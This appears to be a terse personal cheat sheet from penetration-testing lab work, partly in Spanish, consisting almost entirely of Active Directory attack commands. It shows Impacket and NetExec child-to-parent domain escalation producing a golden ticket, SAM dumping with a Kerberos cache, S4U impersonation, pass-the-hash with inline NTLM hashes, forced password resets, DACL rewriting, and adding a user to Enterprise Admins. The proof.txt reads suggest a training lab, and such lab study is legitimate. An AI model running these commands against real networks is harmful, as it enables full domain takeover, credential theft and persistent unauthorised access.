https://queries.specterops.io/
Impacket
python3 /usr/share/doc/python3-impacket/examples/raiseChild.py -target-exec 172.16.173.160 OPS.COMPLY.COM/pete -hashes :6db6cfdf45964a02a80e85a7ab9f4314
NXC
Desde netexec, tenemos que utilizar el modulo de raisechild contra la maquina a la que tenemos acceso. Así obtenemos un golden ticket del administrador del dominio padre, que podemos utilizar para acceder a todas las maquinas del dominio en cuestión.
nxc ldap 172.16.238.165 -d 'ops.comply.com' -u Pete -p 0998ASDaas2 --dns-server 172.16.238.168 -M raisechild
export KRB5CCNAME=Administrator.ccache
nxc smb 172.16.238.165 --use-kcache --sam
nxc smb 172.16.238.165 --use-kcache -x "type \\users\\administrator\\desktop\\proof.txt"
nxc smb 172.16.238.160 --use-kcache -x "type \\users\\administrator\\desktop\\proof.txt"
impacket-getST -spn 'cifs/FILE02.DENKIAIR.COM' -impersonate 'Administrator' -altservice 'cifs' -hashes :b6504636e6f1f89f9a15929c2de34aa8 -dc-ip 172.16.180.101 'DENKIAIR/APP01$'
nxc smb 172.16.238.180 -u adminWebSvc -H b0df1cb0819ca0b7d476d4c868175b94 -d final.com -M change-password -o USER=nina NEWPASS='Alumne1234.'
bloodyAD --host 172.16.238.180 -d final.com -u adminWebSvc -p :b0df1cb0819ca0b7d476d4c868175b94 set password nina 'Alumne1234.'
impacket-dacledit -action write -rights WriteMembers \\
-principal 'SQL ADMINS' \\
-target-dn 'CN=MailAdmins,OU=TGroups,DC=TRICKY,DC=COM' \\
'TRICKY.COM/sqlsvc:4dfgdfFFF542' -dc-ip 172.16.212.150
bloodyAD -d final.com -u tina -p :1d4c153225b424290188504b9e0541eb \\
--host 172.16.111.180 add groupMember 'ENTERPRISE ADMINS' tina